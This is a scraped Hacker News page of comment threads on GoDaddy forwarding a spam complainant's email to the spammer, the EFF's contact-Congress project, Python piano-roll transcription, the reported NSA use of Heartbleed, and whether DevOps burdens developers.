tomp 1 day ago 5 replies      
TL;DR: User got spam from a website hosted by GoDaddy. User reports spam. GoDaddy wants to be good guy and asks spammer if user opted in (by providing spammer with the user's email). Spammer stops spamming, but harasses user by posting her photo online, which s/he probably got using the email address GoDaddy provided.

In retrospect, I'm sure there are better ways for GoDaddy to investigate such complaints, but I think they didn't do something very evil - an email address is hardly "personally identifiable information". On the other hand, if you don't want your photo to be posted online, don't post your photo online.

5
billyhoffman 1 day ago 1 reply      
Yet another reason to not use GoDaddy!.

I highly recommend Hover as a domain Registrar. Tried them with a few new domains, and loved it so much I migrated everything there.

6
josefresco 1 day ago 1 reply      
To contrast this with a real world example, if your neighbor is having a party and you call in a noise compliant to the police, I don't think they tell the party host "we got a noise complaint from your neighbor at 123 My Street".
7
DEinspanjer 1 day ago 0 replies      
I think all this just goes to reinforce the complete brokenness of e-mail to date.

While the proposals for requesting proof of opt-in via SHA hashes and such seem technically feasable, I think it pretty quickly breaks down when you think about how much cost and overhead that would put on GoDaddy (or law enforcement) to manage.

Think about the volume of spam out there. Then imagine a very tiny fraction of that being reported. Each one of those would require validation. While you could automate all the SHA sum comparison stuff, I don't think you could easily automate the validation of whether the opt-in mechanism was appropriate. If the sender indicates there was an opt-in, the validator must still confirm with the complainant whether that is a true claim. Without that, the system is useless because the spammer just keeps a SHA sum for each of the addresses they've purchased and supplies them along with an "Yes they opted in!" claim.

Manually validating the opt-in mechanism would require lots of manpower, and more importantly, a common and universally agreed upon set of rules for how opt-in should work. There are all sorts of nuance in the way there. Should it be a double confirmation? Does existing business relationship count? If so, what are all the rules regarding what constitutes such a relationship? What about unsubscribing afterward?

Edit: Removing the pessimistic and un-useful concluding paragraph on the hunch that was what warranted downvotes.

8
alandarev 1 day ago 2 replies      
Despite all my hate towards GoDaddy, I cannot see the happening being their fault.

As tomp pointed out, disclosing email address is part of the process, probably not clearly stated, but GoDaddy handled it well. They issued a fine to a spammer, resolving the initial spamming case.

Worse would be if they have not carried out any actions at all.

Now, concerned the harrassment, how come GoDaddy is responsible for trolls being trolls? As Company pointed out, report him to law enforcement. Sue him, or anything, victim has got the spammer's domain, thus all the private information needed to escalate the problem further.

9
lettergram 1 day ago 1 reply      
I would report GoDaddy and the spammer to the police. If the spammer went through all that trouble he's probably nuts.
10
devicenull 1 day ago 1 reply      
Forwarding a complaint onto the end user is standard practice these days. It seems that every few months there is a story like this where someone sends an abuse complaint then is surprised when the hosting company sends it to the end user. For any large enough company it's unlikely a person will even read your complaint before it gets forwarded on. Most complaints are designed to be sent to the end user so it's no surprise companies automate this process.
11
MCarusi 1 day ago 1 reply      
Welcome to GoDaddy's customer service. I don't even let them have my domain names. Use NameCheap (and no, I'm not being paid to endorse them).
12
ooobo 1 day ago 1 reply      
There is a similar, perhaps more significant problem with Twitter's abuse reporting tool[0]. To submit the form, users are required to tick the box that notes they accept the following:

"I understand that Twitter may provide third parties, for example the reported user, with details of this report, such as the reported Tweet. Your contact information, like your email address, will not be disclosed."

I think it highly likely that would encourage further abuse. This has prevented me using the tool in the past, and makes me think Twitter doesn't quite understand the issue.

[0]: https://support.twitter.com/forms/abusiveuser

13
maccard 1 day ago 3 replies      
Well, I struggled to get through the first half of that article. Enough banner ads?
14
mathattack 1 day ago 0 replies      
Was their response really just "Go call the cops"?
15
vannevar 1 day ago 0 replies      
There's no reason to expect professionalism from a company that proudly portrays itself as a gang of leering adolescents.
16
devicenull 1 day ago 0 replies      
Released the same personal information that is widely available via WHOIS, it seems..
17
higherpurpose 1 day ago 0 replies      
Please tell me nobody here is actually using GoDaddy anymore. How many lessons does one need to learn before they realize GoDaddy is an awful company?
18
D9u 1 day ago 0 replies      
The spammer appears to be a religious hypocrite, so why not spam the spammer with religious hypocrisy right from their own playbook?

I would begin with Isaiah 45:7 "I form the light, and create darkness: I make peace, and create evil: I the LORD do all these things."

19
leccine 1 day ago 0 replies      
This is the 3rd article on HN about GoDaddy being an absolute shit-show. I am curious how long they gonna keep up.
20
chris123 1 day ago 0 replies      
Not surprising. GoDaddy does not have a good reputation among anyone I know, and I've been involved with domain names since the mid 1990s. I recommend you research other registrars and consider taking your business to them. I know Namecheap has good prices, 2FA, low prices, and discount codes for people leaving GoDaddy. Best wishes.
21
bmoresbest55 1 day ago 0 replies      
I am not hating on Go Daddy but I will say that articles like these do not come out of left field. There was the incident about two months ago with the @N twitter name that involved them and I have heard other grumblings about them. Then when you have other registrars that offer competitive services and do not have those grumblings, you switch. I did. (namecheap.com) Just sayin'...
22
Ihmahr 1 day ago 0 replies      
They are also elephant killing [1] sopa / pipa supporters [2].

[1] http://gawker.com/5787676/meet-godaddys-ridiculous-elephant-...

[2] http://godaddyboycott.org/

23
LazerBear 1 day ago 6 replies      
So which registrar does HN recommend?

I've used Namecheap before and they were decent, though the dashboard looks like it was built in the 90's.

I checked out Hover but they seem to charge a lot for email.

24
rajbala 1 day ago 2 replies      
"I noticed that the email address it came from as well as the link went to a GoDaddy registered domain."

Who does a whois lookup on domains from spam emails?

25
xroche 1 day ago 2 replies      
I'm still puzzled that people are still using companies like Godaddy, Network Solutions etc.. which collect more horror stories than any other ones. Are customers really that stupid ?
26
mirsimiki 1 day ago 0 replies      
I've lost several domains that simply got deleted from my account. Every time I tried contacting them about the subject they refused to answer.
27
chloratine 1 day ago 0 replies      
Time to switch to proxy email id's, which do not give out the first name or the last name.

From now on, I'll be known as wHzqbUWp at gmail.com

28
chatman 1 day ago 2 replies      
Who on earth reports spam to originating server administrators? It might seem contrary to general sentiments here, but really, why not handle your own problem (and adjust your spam filters) instead of troubling GoDaddy?
29
microcolonel 1 day ago 1 reply      
With Skepchick involved, this seems sketchy.

I'm not going to spend today defending GoDaddy, as they've been a fair fly in the ointment to me. However I would not suggest burning them at the stake because of somebody on this particular blog posted an inconclusive statement about a breach which was, as far as we can tell, dealt with already.

As a customer of theirs, I'll probably be contacting them about this to make sure I don't have any similar issues, and suggesting a remedy (probably something like the cryptographic hash based verification method suggested elsewhere on this page) for the future.

27
Dear Web Developers: EFF Needs Your Help eff.org
304 points by frostmatthew  2 days ago   54 comments top 16
1
sinak 2 days ago 2 replies      
Full instructions on how to take part are at this link: http://theunitedstates.io/contact-congress/

And here is the Github repo: https://github.com/unitedstates/contact-congress/

2
Theodores 1 day ago 3 replies      
In the UK we have a decent website for contacting one's MP:

https://www.writetothem.com/about-us

And it works!

For petitions to Number 10 we also have:

http://epetitions.direct.gov.uk/

...and it works, as in you can sign something that will be totally ignored (eyes roll)!

So in every country we are duplicating effort. Hence I think the EFF need to think beyond the shores of that renegade British colony known as the USA. Maybe it is time for some open source system that can be rolled out to everywhere from The Hill to Burkina Faso.

Let's also be honest about those people in congress - do the current batch of revolving door military/corporate oldies that sit there really deserve to be taken seriously? Does anyone believe they understand concepts such as reasoned argument, being fair, the common good, progress, listening instead of speaking, telling the truth instead of lying? Even if they do appear genuinely for the good it can be just an act, as per that person you Americans have for 'President'.

So, to invite participation from the rest of the world and get some enthusiastic input from those that think that the current batch of congressmen are deserved of being Guantanamo-ed, the EFF should think bigger. They should link up with groups that have made progress internationally and work towards a tool for democracy that can work everywhere.

3
rejschaap 1 day ago 4 replies      
I know this is all in good spirit and you just want to show some appreciation for the help. But rewarding programmers by number of commits is a bit perverse. Nowadays everyone generally agrees that paying programmers per line of code is a bad idea. I think rewarding based on number of commits creates very similar unwanted incentives and should probably be avoided completely.
4
joelcollinsdc 1 day ago 1 reply      
The US House of Reps is almost done with development for an API (that was spearheaded by outside organizations like CMF) for 'campaign' communications (communications where the majority of the messages are 'similar') from third party advocacy organizations. After this occurs, the hope is that only messages sent via web forms are completely unique messages sent from constituents without the assistance of a third party. The project has been slow (10 years in the making?) but its near completion. Achieving 100% adoption amongst the 440 member offices is a different question though, although 100% adoption has been mandated.
5
zachlatta 2 days ago 2 replies      
I think it's really great that the EFF is reaching out to the community like this. I reached out to donate time and I encourage you to do the same.
6
trentmb 2 days ago 2 replies      
> Secure Connection Failed

> An error occurred during a connection to www.eff.org. The OCSP server has no status for the certificate. (Error code: sec_error_ocsp_unknown_cert)

Anybody else getting this?

7
aidos 1 day ago 1 reply      
I'm really impressed with the project. It's a great idea - both the concept and the execution are brilliant.

The bookmarklet for generating the yaml file could be used for all sorts of things - I've never seen this idea before. Even better, it's being used to crowdsource the data for the tool.

I'm really impressed with this. Kudos to all involved.

8
scrozier 1 day ago 0 replies      
Have been completely engrossed in this most of the day. Hope it's done soon or I'll have to go cold turkey.
9
GoodGuy 1 day ago 0 replies      
Here is a very effective german platform for not only contacting, but also making the answers to questions visible:

the site - http://www.abgeordnetenwatch.de/the code - https://github.com/parliamentwatch/parliamentwatch

the site is in german, but you might guess the content with a little help from an online translator. It is very popular and linked to from the biggest german online media. It might be an indicator for it's success that several conservative politicians tried to fight this site with all kinds of tricks, but they still did not succeed :)

Unfortunately the code is drupal, it certainly would be much better to convert this to some more flexible framework like pyramid or django, but it works.

It might be a much better alternative to make questions to congressmen publicly visible than just sending stuff into spam-folders of people that do not have interest at all in being contacted by "the people".

10
chrismeller 1 day ago 1 reply      
They really need some copy editing done on everything for this project.
11
microjesus 2 days ago 3 replies      
"How technical do I need to be?" - not very.

Sorry, what?

12
devb0x 1 day ago 0 replies      
Why the down votes?
13
voltagex_ 2 days ago 0 replies      
EFF != FSF.
14
microjesus 2 days ago 1 reply      
An organization that I had hope in, posts something like this for captcha breaking and subtle bullshit. Really? Is this HN or ODesk?
15
phantom_oracle 1 day ago 5 replies      
Disclosure: Only bother if you are American.

Next time you ask, make sure you specify who you are serving. Congress does not serve me as a foreigner (then again, does it serve everyday Americans either?).

New title:

"Dear US Web Developers: EFF Needs Your Help"

16
ttctciyf 1 day ago 2 replies      
I was pretty surprised to see the EFF's naive take on the Tea Party [1] in "recent deeplinks" underneath the linked article, which seems not to recognize it as pretty much an astroturf instrument of the neo-bircher Kochs [2], [3].

Of course co-opting TP sympathizers around a common goal of opposing overweening government surveillance to unknown purpose is a Good Thing, but unless the EFF, an org I've respected for ages, is unaware of the spurious "grassroots" provenance of the Tea Party, which seems very unlikely, I'd expect a less nakedly revisionist approach from them.

[1] https://www.eff.org/deeplinks/2014/04/tea-party-taxes-and-wh...

[2] http://www.nytimes.com/2010/08/29/opinion/29rich.html?_r=0

[3] http://www.astroturfwars.com

28
Transcribing Piano Rolls, the Pythonic Way zulko.github.io
304 points by gcardone_  6 days ago   35 comments top 16
1
eliteraspberrie 6 days ago 1 reply      
The faster way of doing this:

    def fourier_transform(signal, period, tt):        """ See http://en.wikipedia.org/wiki/Fourier_transform        How come Numpy and Scipy don't implement this ??? """        f = lambda func : (signal*func(2*pi*tt/period)).sum()        return f(cos)+ 1j*f(sin)
is using the FFT.

What you want is the power spectral density in the discrete case, called the power spectrum. It can be calculated by multiplying the discrete Fourier transform (FFT) with its conjugate, and shifting. NumPy can do it. Here is an example: http://stackoverflow.com/questions/15382076/plotting-power-s...

2
msvan 5 days ago 0 replies      
What a fascinating convergence of math, music and Python. Many people I meet who don't specialize in math but have taken university-level courses in it seem to remember the Fourier transform as a highlight, probably because of its many applications.
3
kbd 6 days ago 2 replies      
I love the abundance of Python. For those unaware, even the youtube-dl command line utility he used to download the video is written in Python.
4
stevetjoa 5 days ago 0 replies      
Very cool!

Relevant: Zenph makes "re-performances" of old piano recordings. They take a recording, do music transcription magic to get the exact timings and velocities of each note event, and then feed that into a player piano. So it's as if you are listening to the ghost of Rachmaninov sitting at the piano, as shown here: https://www.youtube.com/watch?v=eevzbV6Hkkk&t=28 music starts at 0:28)

(I just visited http://zenph.com for the first time in about a year, and it appears that they've pivoted into a music education company.)

5
selmnoo 6 days ago 0 replies      
That was a lovely read, thank you so much for writing and sharing it.
6
nanidin 6 days ago 1 reply      
Interesting question - is the author's transcription a derivative work of the video? And if so, is he actually allowed to release his transcription into the public domain (without the permission of the author of the video)?
7
rfleck 6 days ago 2 replies      
See a master at work making original rolls at QRS.http://www.youtube.com/watch?v=i3FTaGwfXPM

If was a fun place to see in the 70's after watchingmy father rebuild our player piano.

8
ntoshev 5 days ago 2 replies      
What if you tried to transcribe the music solely from Fourier transform of the audio source? I expect the piano has an abundance of harmonics, but there should be some way to distinguish them from the keys. Hasn't someone done it already?
9
bede 5 days ago 0 replies      
My favourite blog post of 2014. Thank you for sharing.
10
analog31 5 days ago 0 replies      
I think this is a nice solution because it takes care of the hardware side of things by making use of a garden variety video camera.
11
elwell 6 days ago 1 reply      
Really fantastic hack. Now try transcribing with just the audio track.
12
StavrosK 5 days ago 0 replies      
This is beautiful, it's one good idea after another, good job!
13
smortaz 6 days ago 1 reply      
fantastic. with your permission, i'd love to use this to demo python!
14
peapicker 6 days ago 0 replies      
This is really nice, thanks for sharing it with us.
15
cdelsolar 5 days ago 0 replies      
So, so cool. I love posts like this.
16
evidencepi 6 days ago 0 replies      
Nice post, thanks for sharing!
29
NSA Said to Exploit Heartbleed Bug for Intelligence for Years bloomberg.com
294 points by taylorbuley  6 days ago   174 comments top 40
1
spenvo 6 days ago 0 replies      
Here we observe a side affect of the NSA/GHCQ operating in a manner which always gives offensive capability precedence over the defense of civilian systems.

In case you haven't made the time yet -- ACLU's interview of Snowden at SXSW was excellent and dives into the implications of this: https://www.youtube.com/watch?v=UIhS9aB-qgU

On another (ironic) note this PSA from the US government is about 2 years late: http://www.bbc.com/news/technology-26985818

2
molecule 6 days ago 4 replies      
Bloomberg really puts its bias on display:

> The Heartbleed flaw, introduced in early 2012 in a minor adjustment to the OpenSSL protocol, highlights one of the failings of open source software development.

And its discovery and resolution highlights one of the advantages of open-source software development.

3
danenania 6 days ago 1 reply      
I don't know if Heartbleed could reach this point, but I think probably the only possibility for getting average citizens up in arms about this kind of thing is for them to start seeing major personal detrimental effects (like oops, all my email has been stolen and deleted and my bank account's empty), and then learn that the NSA could have easily prevented it if they weren't having so much fun being super-hackers instead.
4
jobu 6 days ago 2 replies      
This looks like another case where the actions of the NSA are the opposite of what's in the best interest of US Citizens.
5
JackC 6 days ago 0 replies      
I've been seeing a lot of comments recently along the lines that we "need" more evidence before we assume that the NSA took advantage of heartbleed. I don't get that at all.

I'd love to have harder evidence of what the NSA has been up to. I get that. But here are some things we know: the NSA believes its mission is to collect 100% of the world's data, with the possible exception of data that definitely belongs to US citizens. The NSA has boasted internally of cracking SSL implementations as part of its work. The NSA employs more people who are qualified for and tasked with finding this kind of exploit than anyone else. The NSA's leadership is willing to lie under oath to Congress -- let alone to anyone else -- about its activities. The NSA's secrets are about as heavily defended as secrets can be -- actually providing the kind of evidence requested here is widely considered treason against the United States. And now an investigative reporter with a serious reputation says that he has two sources who can confirm that the NSA knew about heartbleed shortly after it was created.

So let's assume you might behave differently in some way -- in any way -- if the NSA knew about and exploited heartbleed. You have imperfect information and you have to make a call. What else could you "need" before you decide to behave as though this article is accurate?

I think we "need" to assume that the NSA took advantage of heartbleed starting shortly after it was introduced. We'd just "like" to have a little more confirmation about what the hell they've been up to.

6
mindstab 6 days ago 1 reply      
Evidence? And if so, pretty much what we expected and exactly why this behaviour is terrible
7
tptacek 6 days ago 1 reply      
Yeah, that's not good.
8
jostmey 6 days ago 1 reply      
The NSA protected us by not disclosing to us a serious security vulnerability in our software. It is hard for me to wrap my brain around reasoning of the intelligence agencies.
9
mschuster91 6 days ago 2 replies      
No fucking way. This is disastrous PR stuff, second only to the Snowden revelations.

It should be clear by now that the NSA does not restrict themselves from anything... and should be disbanded.

10
bhousel 6 days ago 1 reply      
Whether it's true or not, I think the correct thing for the NSA to do would be to say that they knew about it for years and exploited it. That is their job, after all.
11
antonius 6 days ago 0 replies      
Good luck trying to wiggle out of this one, NSA.
12
mcculley 6 days ago 0 replies      
This is according to "two people familiar with the matter". While nobody would be surprised that the NSA had exploited heartbleed, this article gives no compelling proof.

I wish newspaper articles had a bit of metadata that indicated whether the sources are verifiable. Then we wouldn't have to waste any time reading them when they aren't.

13
ArtDev 6 days ago 0 replies      
It flies in the face of the agencys comments that defense comes first

The NSA needs to be dissolved. It is a costly liability whose actions work against the nations interests as a whole.

14
jrochkind1 6 days ago 1 reply      
> The agency found the Heartbleed glitch shortly after its introduction, according to one of the people familiar with the matter,

Presumably if the anonymous sources here were discovered, they'd be in big criminal trouble, right? I am curious how far the government goes to try and discover them.

And I think there is no way these anonymous sources would have contacted the journalists without Snowden going first, to establish the context and interest. Snowden's actions continue to benefit us all, cascading.

15
taylorbuley 6 days ago 1 reply      
The NSA is denying this report.

> Statement: NSA was not aware of the recently identified Heartbleed vulnerability until it was made public.

https://twitter.com/NSA_PAO/status/454720059156754434

16
lawnchair_larry 6 days ago 0 replies      
It's going to be pretty hard to say you're playing "defense" with a straight face after this one.
17
thefreeman 6 days ago 0 replies      
So is there a single shred of evidence besides something unquoted by `two people familiar with the matter said`

because if not this is just straight up link bait.

18
higherpurpose 6 days ago 0 replies      
This is how NSA "protects America" and its infrastructure from "cybercrime" - by allowing a bug like this to exist for years without telling anyone about it.

I hope it's now clear to everyone what NSA's vision about "cybersecurity" is. They think having vulnerabilities like this in the Internet's infrastructure is a good thing, because then they get to attack their "targets", to "protect us". It has nothing to do with actual security. Weakness is strength. Vulnerability is security.

19
ChrisLTD 6 days ago 0 replies      
The US government seems intent on destroying the viability of the Internet as a commerce platform.
20
jrochkind1 6 days ago 1 reply      
> The SSL protocol has a history of security problems, Lewis said, and is not the primary form of protection governments and others use to transmit highly sensitive information.

> I knew hackers who could break it nearly 15 years ago, Lewis said of the SSL protocol.

Anyone know wtf he's talking about?

21
humancontact 6 days ago 0 replies      
> two people familiar with the matter said

As much as Snowden has shown us the amount of effort NSA puts into this kind of stuff, I think we need more evidence than this article is giving.

22
malandrew 6 days ago 0 replies      
A reasonable policy upon discovering this type of bug is to allow the agency a fix period of time to exploit the bug and then require that they provide support in fixing the bugs for as many major US companies and institutions as possible as quickly as possible.

If they are given carte blanche to use the exploit indefinitely, they will keep it forever and let the world discover and exploit it as well. If they have a finite time period like 1-3 months, they will prioritize exploiting those systems that are actually valuable for national security. While they are doing so, they should keep an auditable log of all the systems they use the exploit against so that oversight may be performed in hindsight. Furthermore, they should absolutely be barred from using any exploit against a target with a US-based IP, or possibly even any IP address in allied nations.

It is far less likely that the agency will have the opportunity to abuse exploits if they are forced to prioritize targets due to a fixed deadline on disclosure.

During the deadline period, they should also be working on a plan that minimizes the amount of damages once disclosure is forced. i.e. there should be a list of people and companies that get the information first and everyone on the list should be people in charge of protecting computer systems (i.e. no one involved in offensive activities is on the list). Companies like Google, Facebook, Akamai, Apple and the package maintainers for all the major *nix distros should be on that shortlist of those that get priority notification.

23
zacinbusiness 6 days ago 0 replies      
While there's no evidence (yet) that the NSA knew about or exploited this bug, I would not be the least bit surprised if they did. Honestly, my first thought when reading about Heartbleed was "I wonder how much the NSA paid the contributor. Or did they just threaten his family?" It seems there have been a lot of "oops" errors being found in critical security systems these days, and every single one of them is directly beneficial to the NSA and its mission to "h4ck the plan37!"
24
protomyth 6 days ago 2 replies      
I'm wondering if any State Attorney Generals are tech savvy, don't like the current administration, and want some publicity[1] enough to start an investigation? I would imagine a subpoena asking for the financial records of the OpenSSL contributors would be a first step (to find Gov payments). I can see a very scary witch hunt.

1) that part might be a little rhetorical, every AG likes good publicity.

25
lauradhamilton 6 days ago 1 reply      
It certainly seems believable, but do we have anything more concrete to go on than "two people familiar with the matter?" Is that even two people with top-secret clearance at the NSA?
26
stcredzero 6 days ago 1 reply      
Your friends tell you about your flaws and shortcomings. The people who keep quiet or even exploit your flaws? They are not your friends.

So, what's to keep some organization that runs a package repo from publishing OpenSSL packages that claim to be like OpenSSL 1.0.1g but actually display the heartbleed bug? I also ask myself, would the NSA seek to implement such a thing? They would, though that is an entirely different question from if they have.

27
devindotcom 6 days ago 0 replies      
FWIW, we asked the NSA and NSC; both deny:

http://www.nbcnews.com/tech/security/nsa-denies-it-used-hear...

28
schrodingersCat 6 days ago 0 replies      
I hesitate to believe that in 2 years time, the agency hasn't found another backdoor to the web. OpenSSL might be patched, but what else is still vulnerable?
29
otterley 6 days ago 0 replies      
I've never understood theories about NSA capability. Everyone complains that Government officials are barely competent, if at all, yet when it comes to NSA, those same people think NSA staff is at least ten times as brilliant as the general population.

Everything I've seen NSA do is largely based on the same techniques Google uses, except 10 years later, much more expensively, and with much uglier PowerPoint presentations. The only thing NSA has that private organizations don't is the compelled cooperation of telecom companies.

30
dsugarman 6 days ago 0 replies      
What upsets me the most is that they new this existed, and that a lot of the US economy relies on our tech companies, and they did nothing to inform the companies about the security flaw.
31
anonbanker 6 days ago 2 replies      
Now would be the time to start looking up the backgrounds of the people who implemented heartbeat support. For instance, the same guy responsible for the Heartbeat spec was the author of the OpenSSL implementation.

While we do not want to make this into a witch hunt, now that the NSA is involved in Heartbleed, we should definitely rule out malice by checking for direct ties between contributors of known flawed/malicious code related to the implementation of Heartbeat.

32
smegel 6 days ago 1 reply      
> highlights one of the failings of open source software development.

Sorry? Paid programmers writing closed code with probably less review and auditing have been shown to create less bugs? What are they trying to say?

33
tzs 6 days ago 0 replies      
> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug [...]

Interesting that they say "at least" two years. The bug is two years old, so they could have also chosen to say "at most" two years or "up to" two years. Least biased would be to just say "since the bug was introduced, two years ago".

34
forgotAgain 6 days ago 0 replies      
Sounds plausible to me. I would think the NSA, and other spy agencies, pour over every release of a security package to see if any exploitable errors were made.
35
leeoniya 6 days ago 0 replies      
s/Flawed Protocol/Flawed Implementation/
36
err4nt 6 days ago 3 replies      
Do we have anything that leads us to believe the NSA was aware of heartbleed at all before we found out, other than speculation because of their resources?
37
dombili 6 days ago 6 replies      
My first thought: if this is the case, then why did they try so hard (and get "trolled" in the progress) to get the SSL keys from Lavabit?
38
higherpurpose 6 days ago 0 replies      
Well this was flagged fast.
39
abdullahkhalids 6 days ago 0 replies      
You can assume that any bug in open source software that could have been found using systematic and automated analysis has already been found by the NSA.
40
muyuu 6 days ago 1 reply      
This is flamebait. Sad it's getting so many upvotes.
30
How 'DevOps' Is Killing The Developer jeffknupp.com
291 points by jknupp  2 days ago   203 comments top 67
1
NickPollard 2 days ago 23 replies      
DevOps isn't amount making Developers be Ops guys. It's about the fact that automation eats everything, and a significant part of 'ops' is now coding.

A DevOps person isn't someone who develops, and who does Ops. It's someone who does only Ops, but through Development.

It's not about start ups vs Enterprise, it's about 1 person writing programs or 5 people doing things by hand.

2
maratd 2 days ago 4 replies      
The market is maturing. Take a look at a market that is similarly structured. Look at construction.

You have general contractors and then you have subs that work under them. A general contractor is a jack of all trades, master of none. Exactly what a full stack developer is.

This isn't the end of specialization. It's the beginning of project management steered by developers who intimately understand all of the work involved, even if they aren't as competent as the specialists.

Having a team consist of all full-stack developers is just stupid. Having a full-stack developer as the head on a project, with specialists on the team, is a great idea.

3
stiff 2 days ago 2 replies      
You can't really draw a hard line between administration and development, in the end you are just building a system and the more you know about it from all angles the better design decisions you can make and the easier it is to fix issues.

I diagnosed a few problems over the years that arose as apparent issues with a web application but that I gradually narrowed down to things like network issues, or kernel bugs, or system misconfiguration, or database issues etc. Modern stacks are very complicated and the interactions can get really messy, it is close impossible for someone who doesn't understand the whole thing to find issues that aren't neatly isolated. I perfectly know that I do not have the full qualifications of a sys-admin proper, and would not like to do a sys-admin job full time, but in those particular cases a pure sys-admin would not (and often actually could not) find those issues. As an example, I can remember many situations where the application showed different behaviour depending on which application server you hit, and typically both "pure" developers and "pure" sys-admins were having a hard time finding the issue.

Good sys-admins anyway have to learn, at least, C programming, shell scripting, and network protocols and programming, so it's should not be a big deal to add some Rails/Django/Node to their skillset. Good developers anyway have to know things about hardware, networks, protocols and so forth. You do want to have people that are specialized in one or the other area and focus on it on a day to day basis, but you also do want to have people that can understand a particular aspect of the system top to bottom when such a need occurs, and it does happen quite often.

4
hibikir 2 days ago 0 replies      
Pure developers are a problem because they will the information do their job well.

I go back a few years, to an old, waterfall-like job. I was handed work by an analyst, that was handed a task to analyze by an engagement lead, who might at some point talk to someone using the application. The work was always handed out on time, but the product often failed, not because it was buggy, but because nobody actually had much of an idea of what we were really trying to solve.

So us developers got much work done, but the work didn't actually solve real problems: The force is applied to the wrong vector. Then the product fails, and the blame game begins: Changes are too expensive, because the developers didn't know what the real invariants are. Queries are slow, because the database architect wasn't told about the questions that the database had to answer. The business analysis just wrote documents. It was all a big catastrophe.

That company moved to Scrum, the terrible way: Here, have this self organizing team full of specialists that don't know anything outside of their domain. They are still failing to this day, but now they blame each other in retrospectives.

So I'd much rather be stuck coding less, but then being aware that my code is actually solving a problem for someone, than just writing castles in the sky, because everything I've been told about what my userbase needs comes from a game of telephone.

5
rb2k_ 2 days ago 4 replies      
I think the idea is not necessarily to have developers run production systems, but they still should know what production looks like and at least have basic knowledge on how to configure all of the moving parts of the system.

Having developers be 'full stack' imho reduces the amount of "works on my machine". How would a developer test the software he/she is developing on if she can't at least get close to a production environment.

Automated provisioning is just one of the usual 'devops' things that I can't imagine how a proper software engineering process would work without.

I would say that at least 20% of the people I graduated with can create software that works mostly ok when they hit the little green "run" icon in Eclipse. They were however incapable of figuring out why their jar file doesn't work in tomcat on a linux server somewhere.

Usually it was because they're using a local database with root credentials instead of a remote Database with multiple users, they have some file stashed away somewhere in their classpath, they have some binary installed in $PATH that makes the whole thing work.

I think just wanting to be a developer and not know about the stack that your application runs on is like being a painter but refusing to buy paint because you can't see what going to the store has to do with painting.

6
beat 2 days ago 0 replies      
As someone who has been doing DevOps for 20 years, since long before it was called "DevOps"...

First, DevOps has degenerated into a meaningless buzzword to rival "Agile", despite the good ideas and good intentions. Every day, I have recruiters looking for "DevOps". A couple of years ago, they'd never heard the word.

Second, DevOps is actually getting strongly biased toward Ops, often to the exclusion of Dev. In the eyes of recruiters and much of the industry, it's become synonymous with "Chef/Puppet/Ansible automation", a set of automation tools. That's stupid.

Third, and this is what matters to me... DevOps is (or was meant to be/should be) more about organizational structure than skills. As the author points out here, specialization is good and necessary. But specialization comes with bureaucratic compartmentalization that makes working across org boundaries very difficult. When you have to climb four or five (or more) layers up the org chart to find common management for both the dev and ops sides of a project, then the dev team has no authority over and very little way to communicate with ops, and vice versa. For most large organizations, the dev/ops separation is necessary - developers get locked out of production systems to keep them from legal exposure to customer data (HIPAA, PII, etc), and to keep them from accidentally or intentionally altering production in a way that it might break.

Read Gene Kim's excellent quasi-fiction book, The Phoenix Project. It covers a lot of the issues of DevOps as fixing communication patterns in large organizations. You'll see how little of it is about tooling or "full-stack", and how much is about clearing bureaucratic obstacles to effective communication.

7
leccine 2 days ago 0 replies      
The guys is missing the point by 10000 miles. DevOps is about getting together with devs and focus on best practices from day one. Keep in mind that you need to deploy your software in a timely, reliable manner, that is going to run on a network of computers, where part of your system might be down or showing elevated latency. I could not believe how non-trivial were these things until I have seen it with my own eyes that most of the software out there still has the following assumptions: zero latency network with unlimited bandwidth, uptime for servers is 100%, memory and CPU is something you can keep adding to computers. My experience is that when people are talking about DevOps what they really mean is site reliability or systems engineers, people who understand networks and operating systems in depth and can read and write code yet they primary focus is not deliver customer facing services, more like develop tools which can improve deployments, automate error prone processes and optimize/tune operating systems for better performance. In my humble opinion is that developers should be aware of the architecture of the system they are writing software for, but it seems we need another breed of engineers who are more focused on that as of today. Lets call them DevOps... :
8
dsjoerg 2 days ago 1 reply      
"All too common a question now, can you imagine interviewing a chef and asking him what portion of the day he actually devotes to cooking?"

Yes. Chefs also do shopping, menu planning, prep, hiring, firing, marketing, and schmoozing with patrons. Source: I know a chef.

9
pnathan 2 days ago 2 replies      
This article is pretty ignorant.

I don't think most developers have the capability to be sysadmins or QA. Vice versa, too, quite often. Joe developer ain't that special.

Devops is about taking moving the infrastructure into its own configuration-managed artifact, taking lessons from programming and computer science, and coming out with its own engineering rigor.

If you want your devs to operate builds/infrastructure/etc/etc, that's fine, but devops that ain't. That's called "many hats".

10
lmm 2 days ago 0 replies      
I found it very interesting that Facebook apparently hired programmers for all its roles in the early days - even e.g. the receptionist. I think the point that this article misses is that a 'devops' person - that is to say, someone with both sysadmin and development skills, whichever side of the fence they originated on - can do the job better than someone who is "just a sysadmin" and incapable of programming. When you look at modern ops infrastructure like Puppet, you're looking at programs, written in programming languages, and it's foolish to pretend otherwise. So like it or not, you need to hire someone who can program to manage it. If you imagine you can get a cheaper non-technical ops person to handle this and save money, you're going to get inferior results.

I think this is going to happen to more and more careers. Already a profession like surgery or piloting a modern airliner is starting to require some of the skills we think of as programming. Software is eating the world - that doesn't make domain expertise irrelevant, but it means you need people with domain expertise and programming skills. That applies to non-programming roles in the software industry just as it applies to other industries.

11
ef4 2 days ago 0 replies      
The author is missing the fact that good developers can actually automate away a lot of those "lower on the totem pole" roles, or at least reduce the amount of repetitive stuff down to the point where the remaining work is quite abstract and basically just more programming.

This isn't counter to specialization -- in a big organization, people are certainly still going to specialize. But the "DBA" equivalent people are just programmers who have fresh expertise on the storage layer, and the "QA" people are just programmers who have expertise on the automated build and test systems.

The dentist analogy doesn't hold in software. A dentist handling secretarial work is just an expensive waste of time, due to comparative advantage. But a programmer replacing secretarial work with automation often reaps big long-term dividends.

12
gatehouse 2 days ago 0 replies      
This is an interesting rant. I had never seen DevOps as being "for" developers. My impression has always been that it is sysadmins quest for a high degree of automation and streamlining that allows them to manage hundreds of systems without waking up in the middle of the night sweating. And when you're looking for a sophisticated tool to control something, you inevitably find yourself writing software.
13
digisth 2 days ago 0 replies      
It's definitely more complicated than the post implies, and it most definitely is NOT only for startups. Soon after I started out - at a mature company already making plenty of money - I was a full-stack engineer. There were a number of reasons:

- New development happened sporadically; day-to-day work was a mixture of maintenance development and admin work

- Culture. They started with a small team, and never grew it. Having more people didn't fit with the way the company saw itself.

